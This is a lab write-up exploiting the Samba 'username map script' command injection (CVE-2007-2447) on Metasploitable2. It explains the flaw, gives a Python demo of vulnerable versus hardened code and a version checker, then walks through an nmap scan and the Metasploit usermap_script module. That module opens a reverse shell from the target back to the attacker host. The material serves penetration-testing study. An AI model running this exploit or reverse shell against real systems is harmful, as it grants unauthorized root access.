Cause
Samba's non-default "username map script" option in smb.conf names an external script that smbd runs through /bin/sh to map incoming user names. Affected Samba 3.0.x releases spliced the user name received over MS-RPC (the SamrChangePassword call, which is reachable without authentication) into that shell command line without filtering shell metacharacters, so a user name containing backticks or $( ) executes attacker-chosen commands with smbd's privileges, normally root. This is CVE-2007-2447; the Metasploit module used below is built on it.
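To make the injection concrete, the following added example (written for this page; it is not Samba's code and not the Metasploit module) reproduces the pre-fix pattern in Python: the raw user name is pasted into a command string handed to /bin/sh, beside a hardened version that allowlists the user name and runs the script with an argv list so no shell parses it. The map script is stood in for by /bin/echo, and the allowlist regex is this example's own choice, not Samba's validation rule.

```python
import re
import subprocess

# Stand-in for the administrator-supplied "username map script": it simply
# echoes its argument back as the mapped user name. Hypothetical choice for
# this demo; a real deployment points at a site-specific script.
MAP_SCRIPT = "/bin/echo"

# Conservative allowlist for names that get handed to an external command.
# This is an assumption of the example, not Samba's own rule.
SAFE_USERNAME = re.compile(r"[A-Za-z0-9._-]{1,64}")


def map_username_vulnerable(username: str) -> str:
    """Pre-fix pattern: the unfiltered user name is spliced into a shell
    command line and given to /bin/sh, so backticks or $(...) inside it
    are executed before the map script ever sees its argument."""
    cmd = f"{MAP_SCRIPT} {username}"
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout.strip()


def map_username_hardened(username: str) -> str:
    """Two independent fixes: reject anything outside the allowlist, and
    execute the script with an argv list so no shell parses the name."""
    if not SAFE_USERNAME.fullmatch(username):
        raise ValueError(f"rejected username: {username!r}")
    proc = subprocess.run([MAP_SCRIPT, username], capture_output=True, text=True)
    return proc.stdout.strip()


if __name__ == "__main__":
    benign = "alice"
    # Constructed attacker-controlled name in the shape the exploit uses
    # (a command wrapped in backticks); here it only echoes a marker.
    hostile = "`echo injected`"
    print("vulnerable, benign :", map_username_vulnerable(benign))
    print("vulnerable, hostile:", map_username_vulnerable(hostile))
    print("hardened,   benign :", map_username_hardened(benign))
    try:
        map_username_hardened(hostile)
    except ValueError as exc:
        print("hardened,   hostile:", exc)
```

With the hostile name the vulnerable path returns "injected", the output of the embedded command, while the hardened path refuses the name before any process is started. Either fix alone closes this particular hole; combining them also protects against a map script that is itself a shell wrapper.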
Lab environment
The target used here is Metasploitable2.
Linux attacker: 192.168.43.113
Linux target: 192.168.43.23
Exploitation
First scan the target to collect service information. nmap -sV enumerates the open ports and the applications behind them; it is run here from inside msfconsole, which passes commands it does not recognise to the system shell:
msf5 > nmap -sV 192.168.43.23
[*] exec: nmap -sV 192.168.43.23
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-02 22:22 CST
Nmap scan report for 192.168.43.23
Host is up (0.0012s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec?
513/tcp open login?
514/tcp open shell?
1099/tcp open rmiregistry GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
8009/tcp open ajp13?
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port514-TCP:V=7.70%I=7%D=9/2%Time=5F4FAAAA%P=x86_64-pc-linux-gnu%r(NULL,2B,"\x01Couldn't\x20get\x20address\x20for\x20your\x20host\x20\(kali\)\n");
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 130.39 seconds
The target exposes Samba on 139 and 445. nmap's version probe only narrows it to "3.X - 4.X", so on a real engagement confirm the exact build first (for example with nmap --script smb-os-discovery -p 445, which reports the Samba version string). Use search samba 3.x to find exploit modules; the search matches the words "samba" and "3.x" separately, which is why the list below also contains many unrelated modules. The relevant one is exploit/multi/samba/usermap_script.
msf5 > search samba 3.x
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 auxiliary/admin/http/intersil_pass_reset 2007-09-10 normal Yes Intersil (Boa) HTTPd Basic Authentication Password Reset
2 auxiliary/admin/smb/samba_symlink_traversal normal No Samba Symlink Directory Traversal
3 auxiliary/dos/samba/lsa_addprivs_heap normal No Samba lsa_io_privilege_set Heap Overflow
4 auxiliary/dos/samba/lsa_transnames_heap normal No Samba lsa_io_trans_names Heap Overflow
5 auxiliary/dos/samba/read_nttrans_ea_list normal No Samba read_nttrans_ea_list Integer Overflow
6 auxiliary/scanner/rsync/modules_list normal Yes List Rsync Modules
7 auxiliary/scanner/smb/smb_uninit_cred normal Yes Samba _netr_ServerPasswordSet Uninitialized Credential State
8 auxiliary/scanner/ssh/eaton_xpert_backdoor 2018-07-18 normal Yes Eaton Xpert Meter SSH Private Key Exposure Scanner
9 exploit/freebsd/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (*BSD x86)
10 exploit/linux/http/efw_chpasswd_exec 2015-06-28 excellent No Endian Firewall Proxy Password Change Command Injection
11 exploit/linux/http/imperva_securesphere_exec 2018-10-08 excellent Yes Imperva SecureSphere PWS Command Injection
12 exploit/linux/http/zenoss_showdaemonxmlconfig_exec 2012-07-30 good Yes Zenoss 3 showDaemonXMLConfig Command Execution
13 exploit/linux/samba/chain_reply 2010-06-16 good No Samba chain_reply Memory Corruption (Linux x86)
14 exploit/linux/samba/is_known_pipename 2017-03-24 excellent Yes Samba is_known_pipename() Arbitrary Module Load
15 exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Yes Samba lsa_io_trans_names Heap Overflow
16 exploit/linux/samba/setinfopolicy_heap 2012-04-10 normal Yes Samba SetInformationPolicy AuditEventsInfo Heap Overflow
17 exploit/linux/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Linux x86)
18 exploit/multi/http/joomla_http_header_rce 2015-12-14 excellent Yes Joomla HTTP Header Unauthenticated Remote Code Execution
19 exploit/multi/http/plone_popen2 2011-10-04 excellent Yes Plone and Zope XMLTools Remote Command Execution
20 exploit/multi/http/rails_xml_yaml_code_exec 2013-01-07 excellent No Ruby on Rails XML Processor YAML Deserialization Code Execution
21 exploit/multi/http/struts2_code_exec_showcase 2017-07-07 excellent Yes Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution
22 exploit/multi/http/struts_code_exec_classloader 2014-03-06 manual No Apache Struts ClassLoader Manipulation Remote Code Execution
23 exploit/multi/http/struts_default_action_mapper 2013-07-02 excellent Yes Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
24 exploit/multi/samba/nttrans 2003-04-07 average No Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
25 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
26 exploit/osx/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
27 exploit/osx/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Mac OS X PPC)
28 exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
29 exploit/solaris/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Solaris SPARC)
30 exploit/unix/http/quest_kace_systems_management_rce 2018-05-31 excellent Yes Quest KACE Systems Management Command Injection
31 exploit/unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution
32 exploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Yes Citrix Access Gateway Command Execution
33 exploit/unix/webapp/joomla_akeeba_unserialize 2014-09-29 excellent Yes Joomla Akeeba Kickstart Unserialize Remote Code Execution
34 exploit/unix/webapp/joomla_contenthistory_sqli_rce 2015-10-23 excellent Yes Joomla Content History SQLi Remote Code Execution
35 exploit/unix/webapp/joomla_media_upload_exec 2013-08-01 excellent Yes Joomla Media Manager File Upload Vulnerability
36 exploit/unix/webapp/phpmyadmin_config 2009-03-24 excellent No PhpMyAdmin Config File Code Injection
37 exploit/windows/browser/awingsoft_web3d_bof 2009-07-10 average No AwingSoft Winds3D Player SceneURL Buffer Overflow
38 exploit/windows/fileformat/ms14_060_sandworm 2014-10-14 excellent No MS14-060 Microsoft Windows OLE Package Manager Code Execution
39 exploit/windows/http/apache_modjk_overflow 2007-03-02 great Yes Apache mod_jk 1.2.20 Buffer Overflow
40 exploit/windows/http/ia_webmail 2003-11-03 average No IA WebMail 3.x Buffer Overflow
41 exploit/windows/http/sambar6_search_results 2003-06-21 normal Yes Sambar 6 Search Results Buffer Overflow
42 exploit/windows/license/calicclnt_getconfig 2005-03-02 average No Computer Associates License Client GETCONFIG Overflow
43 exploit/windows/smb/group_policy_startup 2015-01-26 manual No Group Policy Script Execution From Shared Resource
44 post/linux/gather/enum_configs normal No Linux Gather Configurations
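The usermap_script row above shows "Check: No", so the module has no built-in pre-check and a failed run tells you nothing about why. The added example below (mine, not part of this page or of Metasploit) parses a Samba version banner such as the one nmap's smb-os-discovery script reports and says whether it falls inside the range the Samba advisory gives for CVE-2007-2447, 3.0.0 through 3.0.25rc3 (the Metasploit module itself targets 3.0.20 through 3.0.25rc3). The banners fed to it are constructed for the demo. A version in range is necessary but not sufficient: "username map script" is not set by default, and the generic "3.X - 4.X" banner from nmap -sV is deliberately treated as unknown.

```python
import re

# Affected range per the Samba advisory for CVE-2007-2447.
# Key layout: (major, minor, patch, stage, sub) where stage 0 = release
# candidate and 1 = final release; sub = rc number or letter-suffix ordinal.
FIRST_AFFECTED = (3, 0, 0, 1, 0)     # 3.0.0
LAST_AFFECTED = (3, 0, 25, 0, 3)     # 3.0.25rc3

_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:(rc)(\d+)|([a-z]))?")


def parse_samba_version(banner: str):
    """Extract an orderable version key from strings like 'Samba 3.0.20-Debian',
    '3.0.25rc3' or '3.0.26a'. Returns None when no x.y.z version is present,
    e.g. for nmap's generic 'Samba smbd 3.X - 4.X' banner."""
    m = _VERSION_RE.search(banner)
    if not m:
        return None
    major, minor, patch = (int(m.group(i)) for i in (1, 2, 3))
    if m.group(4):                               # rcN sorts before the final release
        return (major, minor, patch, 0, int(m.group(5)))
    letter = m.group(6)                          # 3.0.20a/b style point fixes
    sub = ord(letter) - ord("a") + 1 if letter else 0
    return (major, minor, patch, 1, sub)


def usermap_version_in_range(banner: str) -> bool:
    """True only when the banner carries a concrete version inside the affected range."""
    key = parse_samba_version(banner)
    return key is not None and FIRST_AFFECTED <= key <= LAST_AFFECTED


if __name__ == "__main__":
    # Constructed sample banners, not captured from the lab target.
    for banner in ("Samba 3.0.20-Debian", "3.0.25rc3", "3.0.25",
                   "3.0.26a", "4.9.5-Debian", "Samba smbd 3.X - 4.X"):
        print(f"{banner:28} in range: {usermap_version_in_range(banner)}")
```

Treat a True result as "worth trying", not as proof: the only real check is whether the run returns a session, and a False result from an exact banner is a reason to stop rather than to keep throwing the module at the host.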
Select the exploit module, then list the payloads that are compatible with it:
msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 cmd/unix/bind_awk normal No Unix Command Shell, Bind TCP (via AWK)
2 cmd/unix/bind_busybox_telnetd normal No Unix Command Shell, Bind TCP (via BusyBox telnetd)
3 cmd/unix/bind_inetd normal No Unix Command Shell, Bind TCP (inetd)
4 cmd/unix/bind_lua normal No Unix Command Shell, Bind TCP (via Lua)
5 cmd/unix/bind_netcat normal No Unix Command Shell, Bind TCP (via netcat)
6 cmd/unix/bind_netcat_gaping normal No Unix Command Shell, Bind TCP (via netcat -e)
7 cmd/unix/bind_netcat_gaping_ipv6 normal No Unix Command Shell, Bind TCP (via netcat -e) IPv6
8 cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl)
9 cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6
10 cmd/unix/bind_r normal No Unix Command Shell, Bind TCP (via R)
11 cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby)
12 cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6
13 cmd/unix/bind_socat_udp normal No Unix Command Shell, Bind UDP (via socat)
14 cmd/unix/bind_zsh normal No Unix Command Shell, Bind TCP (via Zsh)
15 cmd/unix/generic normal No Unix Command, Generic Command Execution
16 cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet)
17 cmd/unix/reverse_awk normal No Unix Command Shell, Reverse TCP (via AWK)
18 cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet)
19 cmd/unix/reverse_ksh normal No Unix Command Shell, Reverse TCP (via Ksh)
20 cmd/unix/reverse_lua normal No Unix Command Shell, Reverse TCP (via Lua)
21 cmd/unix/reverse_ncat_ssl normal No Unix Command Shell, Reverse TCP (via ncat)
22 cmd/unix/reverse_netcat normal No Unix Command Shell, Reverse TCP (via netcat)
23 cmd/unix/reverse_netcat_gaping normal No Unix Command Shell, Reverse TCP (via netcat -e)
24 cmd/unix/reverse_openssl normal No Unix Command Shell, Double Reverse TCP SSL (openssl)
25 cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl)
26 cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl)
27 cmd/unix/reverse_php_ssl normal No Unix Command Shell, Reverse TCP SSL (via php)
28 cmd/unix/reverse_python normal No Unix Command Shell, Reverse TCP (via Python)
29 cmd/unix/reverse_python_ssl normal No Unix Command Shell, Reverse TCP SSL (via python)
30 cmd/unix/reverse_r normal No Unix Command Shell, Reverse TCP (via R)
31 cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby)
32 cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby)
33 cmd/unix/reverse_socat_udp normal No Unix Command Shell, Reverse UDP (via socat)
34 cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet)
35 cmd/unix/reverse_zsh normal No Unix Command Shell, Reverse TCP (via Zsh)
Set the cmd/unix/reverse payload (a "double reverse" shell: the target opens two telnet connections back to the handler, which pairs them by echoing a random token over one and reading it back on the other)
Set the target IP address
Set the target port (the module defaults to 139; both 139 and 445 serve SMB on this target)
Set the IP address of the attacking host that the shell should connect back to
msf5 exploit(multi/samba/usermap_script) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf5 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.43.23
RHOSTS => 192.168.43.23
msf5 exploit(multi/samba/usermap_script) > set RPORT 445
RPORT => 445
msf5 exploit(multi/samba/usermap_script) > set LHOST 192.168.43.113
LHOST => 192.168.43.113
msf5 exploit(multi/samba/usermap_script) > options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.43.23 yes The target address range or CIDR identifier
RPORT 445 yes The target port (TCP)
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.43.113 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
With the options set, launch the module with exploit or run (run is an alias of exploit):
msf5 exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP double handler on 192.168.43.113:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo oQwX81x659bJ0os8;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "oQwX81x659bJ0os8\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 4 opened (192.168.43.113:4444 -> 192.168.43.23:49794) at 2020-09-02 23:02:57 +0800
After the exploit succeeds msf hands back a command shell on the target. To confirm that the shell really runs on the target rather than somewhere unexpected, check the hostname, the user (id; smbd runs as root, so the shell normally does too) and the IP address. Here ifconfig is used for the address:
ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:fa:dd:2a
inet addr:192.168.43.23 Bcast:192.168.43.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fefa:dd2a/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:2410 errors:0 dropped:0 overruns:0 frame:0
TX packets:1961 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:190106 (185.6 KB) TX bytes:138231 (134.9 KB)
Interrupt:17 Base address:0x2000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:278 errors:0 dropped:0 overruns:0 frame:0
TX packets:278 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:110249 (107.6 KB) TX bytes:110249 (107.6 KB)
The inet addr on eth0 is 192.168.43.23, the target's address, so the command executed on the target.
Summary
Summary: five minutes to attack, two hours to set up the lab. Another plain but productive day!